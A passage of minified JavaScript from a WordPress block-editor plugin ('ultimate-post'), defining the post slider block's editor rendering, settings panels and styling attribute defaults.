t=N.substr(0,6),l=I(B(N));(0,b.h)(e),(0,n.qi)(H,l,Ve,N),z?z&&z!=t&&(l?.hasOwnProperty("ref")||(0,n.k0)()||l?.hasOwnProperty("theme")||H({blockId:t})):(H({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&H({queryType:"archiveBuilder"}))}),[N]),_((()=>{const e=t.current;(0,v.o6)()&&0===R.dcFields.length&&H({dcFields:Array(w.PR).fill(void 0)}),e?((0,n.Qr)(e,R)&&(Je(),t.current=R),e.isSelected!==O&&O&&(0,k.gT)($e,Ke)):t.current=R}),[R]);const Xe={settingTab:M,setSettingTab:A,setAttributes:H,name:Z,attributes:R,setSection:$e,section:l.section,clientId:N,context:D,setSelectedDc:Ge,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){Ge(e),Ke("dc_group")}};let Qe;if(z&&(Qe=(0,m.Kh)(R,"ultimate-post/post-slider-1",z,(0,n.k0)())),We)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:We});const et=T({...Fe&&{id:Fe},className:`ultp-block-${z} ${j}`,onClick:e=>{e.stopPropagation(),$e("general"),Ke("")}});return(0,o.createElement)(S,null,(0,o.createElement)(w.FP,{store:Xe,selected:l.toolbarSettings}),(0,o.createElement)(g.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"feat_toggle",label:__("Slider Features","ultimate-post"),data:[...n.$m,{type:"toggle",key:"imageShow",label:__("Image","ultimate-post")}],new:n.KE,[ze?"exclude":"dep"]:n.N2}],store:Xe}),(0,o.createElement)(x,null,(0,o.createElement)(w.ZP,{store:Xe})),(0,o.createElement)("div",et,Qe&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Qe}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},function(){const e=`${Se}`,t={arrows:q,dots:K,autoplay:Y,autoplaySpeed:J,nextArrow:(0,o.createElement)((e=>{const{className:t,onClick:l}=e,a=G.split("#");return(0,o.createElement)("div",{className:t,onClick:e=>{Ye(e,l)}},i.ZP[a[1]])}),null),prevArrow:(0,o.createElement)((e=>{const{className:t,onClick:l}=e,a=G.split("#");return(0,o.createElement)("div",{className:t,onClick:e=>{Ye(e,l)}},i.ZP[a[0]])}),null)};void 0!==He.lg&&parseInt(He.lg)<2?(t.fade=$,t.slidesToShow=1):(t.slidesToShow=parseInt(He.lg),t.responsive=[{breakpoint:1024,settings:{slidesToShow:parseInt(He.sm)||1,slidesToScroll:1}},{breakpoint:600,settings:{slidesToShow:parseInt(He.xs)||1,slidesToScroll:1}}]),t.appendDots=e=>(0,o.createElement)("div",{onClick:e=>function(e){e.stopPropagation(),$e("dot"),Ke("dot")}(e)},(0,o.createElement)("ul",null," ",e," "));const m=(0,n.fk)(t),g=(e,t)=>(0,v.o6)()&&Re&&(0,o.createElement)(f.Z,{idx:e,postId:t,fields:De,settingsOnClick:(e,t)=>{e?.stopPropagation(),Ke(t)},selectedDC:l.selectedDC,setSelectedDc:Ge,setAttributes:H,dcFields:De});return l.error?(0,o.createElement)(L,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(L,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(P,null)):l.postsList.length>0?(0,o.createElement)("div",{className:"ultp-block-items-wrap"},(0,o.createElement)("div",{onClick:e=>{e.preventDefault(),$e("heading"),Ke("heading")}},(0,o.createElement)(y.Z,{props:{headingShow:ue,headingStyle:de,headingAlign:me,headingURL:ge,headingText:ye,setAttributes:H,headingBtnText:be,subHeadingShow:ve,subHeadingText:he,headingTag:Ze}})),(0,o.createElement)(a.Z,m,l.postsList.map(((t,l)=>{const a=JSON.parse(pe.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:l,className:`ultp-block-item post-id-${t.ID}`},(0,o.createElement)("div",{className:"ultp-block-slider-wrap"},(0,o.createElement)("div",{className:"ultp-block-image-inner"},(t.image&&!t.is_fallback||je)&&F&&(0,o.createElement)(p.xj,{imgOverlay:ke,imgOverlayType:we,post:t,fallbackEnable:je,idx:l,imgCrop:W,onClick:()=>{}})),(0,o.createElement)(p.UU,{contentHorizontalPosition:Te,contentVerticalPosition:xe,onClick:e=>{e.stopPropagation(),$e("image"),Ke("image")}},(0,o.createElement)("div",{className:"ultp-block-content-inner"},(0,o.createElement)(r.Z,{post:t,catShow:le,catStyle:ie,catPosition:ne,customCatColor:Ce,onlyCatColor:Ee,onClick:e=>{$e("taxonomy-/-category"),Ke("cat")}}),g(6,t.ID),t.title&&ae&&1==re&&(0,o.createElement)(d.Z,{title:t.title,headingTag:Pe,titleLength:Ie,titleStyle:Me,onClick:e=>{$e("title"),Ke("title")}}),g(5,t.ID),ce&&"top"==fe&&(0,o.createElement)(c.Z,{meta:a,post:t,metaSeparator:oe,metaStyle:te,metaMinText:Be,metaAuthorPrefix:Ue,metaDateFormat:Ae,authorLink:Ne,onClick:e=>{$e("meta"),Ke("meta")}}),g(4,t.ID),t.title&&ae&&0==re&&(0,o.createElement)(d.Z,{title:t.title,headingTag:Pe,titleLength:Ie,titleStyle:Me,onClick:e=>{$e("title"),Ke("title")}}),g(3,t.ID),se&&(0,o.createElement)(s.Z,{excerpt:t.excerpt,excerpt_full:t.excerpt_full,seo_meta:t.seo_meta,excerptLimit:ee,showFullExcerpt:_e,showSeoMeta:Le,onClick:e=>{$e("excerpt"),Ke("excerpt")}}),g(2,t.ID),X&&(0,o.createElement)(u.Z,{readMoreText:Q,readMoreIcon:V,titleLabel:t.title,onClick:()=>{$e("read-more"),Ke("read-more")}}),g(1,t.ID),ce&&"bottom"==fe&&(0,o.createElement)(c.Z,{meta:a,post:t,metaSeparator:oe,metaStyle:te,metaMinText:Be,metaAuthorPrefix:Ue,metaDateFormat:Ae,authorLink:Ne,onClick:e=>{$e("meta"),Ke("meta")}}),g(0,t.ID),(0,v.o6)()&&Re&&(0,o.createElement)(h.Z,{dcFields:De,setAttributes:H,startOnboarding:qe})))))})))):(0,o.createElement)(L,{className:"ultp-backend-block-loading",label:Oe})}())))}},92807:(e,t,l)=>{"use strict";l.d(t,{FP:()=>y,PR:()=>m,ZP:()=>g});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(69735),p=l(82473),c=l(87282),u=l(92637),d=l(43581);const{__}=wp.i18n,m=7;function g({store:e}){const{section:t,settingTab:l,setSettingTab:n}=e,{V4_1_0_CompCheck:{runComp:r}}=e.attributes;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(d.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6840",store:e}),(0,o.createElement)(u.Sections,{settingTab:l,setSettingTab:n},(0,o.createElement)(u.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:e}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Include","ultimate-post"),include:c.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Exclude","ultimate-post"),include:c.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(u.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{initialOpen:t.general,store:e,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:2,data:{type:"range",key:"slidesToShow",min:1,max:8,step:1,responsive:!0,_inline:!0,label:__("Number of Slide","ultimate-post")}},{position:3,data:{type:"range",key:"height",label:__("Height","ultimate-post"),min:0,max:1e3,step:1,unit:!0,_inline:!0,responsive:!0}},{position:4,data:{type:"range",key:"slideSpeed",min:0,max:1e4,step:100,_inline:!0,label:__("Slide Speed","ultimate-post")}},{position:5,data:{type:"range",key:"sliderGap",min:0,max:100,_inline:!0,label:__("Slider Gap","ultimate-post")}},{position:6,data:{type:"toggle",key:"autoPlay",label:__("Auto Play","ultimate-post")}},{position:7,data:{type:"toggle",key:"fade",label:__("Animation Fade","ultimate-post")}},{position:8,data:{type:"toggle",key:"dots",label:__("Dots","ultimate-post")}},{position:9,data:{type:"toggle",key:"arrows",label:__("Arrows","ultimate-post")}},{position:10,data:{type:"toggle",key:"preLoader",label:__("Pre Loader","ultimate-post")}}],exclude:["columns","columnGridGap"]}),(0,o.createElement)(a.VH,{isTab:!0,store:e,depend:"titleShow",initialOpen:t.title,hrIdx:[4,9]}),(0,o.createElement)(a.Hn,{isTab:!0,store:e,initialOpen:t.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgWidth","imgHeight","imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],hrIdx:[{tab:"settings",hr:[1,9]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:e,depend:"metaShow",initialOpen:t.meta,exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[]},{tab:"style",hr:[2,8]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:t["taxonomy-/-category"],depend:"catShow",store:e,exclude:["catPosition"],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.oY,{isTab:!0,store:e,initialOpen:t["read-more"],depend:"readMore"}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:t.excerpt,store:e,hrIdx:[3,6]}),(0,o.createElement)(a.tf,{depend:"arrows",store:e,initialOpen:t.arrow}),(0,o.createElement)(a.H_,{depend:"dots",store:e,initialOpen:t.dot}),(0,o.createElement)(a.O2,{store:e,exclude:["contentWrapInnerPadding"],include:[{position:0,data:{type:"tag",key:"contentVerticalPosition",label:"Vertical Position",disabled:!0,options:[{value:"topPosition",label:__("Top","ultimate-post")},{value:"middlePosition",label:__("Middle","ultimate-post")},{value:"bottomPosition",label:__("Bottom","ultimate-post")}]}},{position:1,data:{type:"tag",key:"contentHorizontalPosition",label:__("Horizontal Position","ultimate-post"),disabled:!0,options:[{value:"leftPosition",label:__("Left","ultimate-post")},{value:"centerPosition",label:__("Center","ultimate-post")},{value:"rightPosition",label:__("Right","ultimate-post")}]}},{position:2,data:{type:"separator"}},{position:11,data:{type:"dimension",key:"contentMargin",label:__("Content Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),!r&&(0,o.createElement)(i.Z,{open:t.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:e,initialOpen:t.heading,depend:"headingShow"}))),(0,o.createElement)(u.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}function y({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:c,titleShow:u,catPosition:d,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,u&&0==m,i&&"top"==b,u&&1==m];if((0,s.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(p.Z,{store:t,selected:e,layoutContext:k});switch(e){case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"arrow":return(0,o.createElement)(r.Z,{text:"Arrow"},(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.fA)({include:a.I0,exclude:"__all",title:__("Arrow Dimension","ultimate-post")}),store:t,label:__("Arrow Dimension","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.YG,include:(0,a.fA)({title:__("Arrow Style","ultimate-post"),exclude:["separatorStyle",...a.I0]}),store:t,label:__("Arrow Style","ultimate-post")}));case"dot":return(0,o.createElement)(r.Z,{text:"Dots"},(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.oc)({include:a.EG,exclude:"__all",title:__("Dots Dimension","ultimate-post")}),store:t,label:__("Dots Dimension","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.YG,include:(0,a.oc)({title:__("Dots Settings","ultimate-post"),exclude:["separatorStyle",...a.EG]}),store:t,label:__("Dots Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(a.sT,{store:t,attrKey:"titleTypo",label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleBackground","titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exSettings:["catPosition"],exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exSettings:["imgWidth","imgHeight","imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],exStyle:["imgWidth","imgHeight","imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},48161:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},slidesToShow:{type:"object",default:{lg:"1",sm:"1",xs:"1"}},autoPlay:{type:"boolean",default:!0},height:{type:"object",default:{lg:"550",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-image,  \n          {{ULTP}} .ultp-block-slider-wrap { height: {{height}}; }"}]},slideSpeed:{type:"string",default:"3000",style:[{depends:[{key:"autoPlay",condition:"==",value:!0}]}]},sliderGap:{type:"string",default:"10",style:[{selector:"{{ULTP}} .ultp-block-items-wrap .slick-slide > div { padding: 0 {{sliderGap}}px; line-height: 0px; }\n          {{ULTP}} .ultp-block-items-wrap .slick-list { margin: 0 -{{sliderGap}}px; }"}]},dots:{type:"boolean",default:!0},arrows:{type:"boolean",default:!0},preLoader:{type:"boolean",default:!1},fade:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#0e1523",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"#037fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-content .ultp-block-title,  \n          {{ULTP}} .ultp-block-item .ultp-block-content .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:25,bottom:12,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},imageShow:{type:"boolean",default:!0},imgCrop:{type:"string",default:"full"},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},fallbackEnable:{type:"boolean",default:!0},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:40,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#777",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt,  \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt,  \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:10,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},arrowStyle:{type:"string",default:"leftAngle2#rightAngle2",style:[{depends:[{key:"arrows",condition:"==",value:!0}]}]},arrowSize:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next svg,  \n          {{ULTP}} .slick-prev svg { width:{{arrowSize}}; }"}]},arrowWidth:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { width:{{arrowWidth}}; }"}]},arrowHeight:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { height:{{arrowHeight}}; }  \n          {{ULTP}} .slick-arrow { line-height:{{arrowHeight}}; }"}]},arrowVartical:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next { right:{{arrowVartical}}; }  \n          {{ULTP}} .slick-prev { left:{{arrowVartical}}; }"}]},arrowColor:{type:"string",default:"#037fff",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:before { color:{{arrowColor}}; }  \n          {{ULTP}} .slick-arrow svg { color:{{arrowColor}}; }"}]},arrowHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover:before { color:{{arrowHoverColor}}; }  \n          {{ULTP}} .slick-arrow:hover svg { 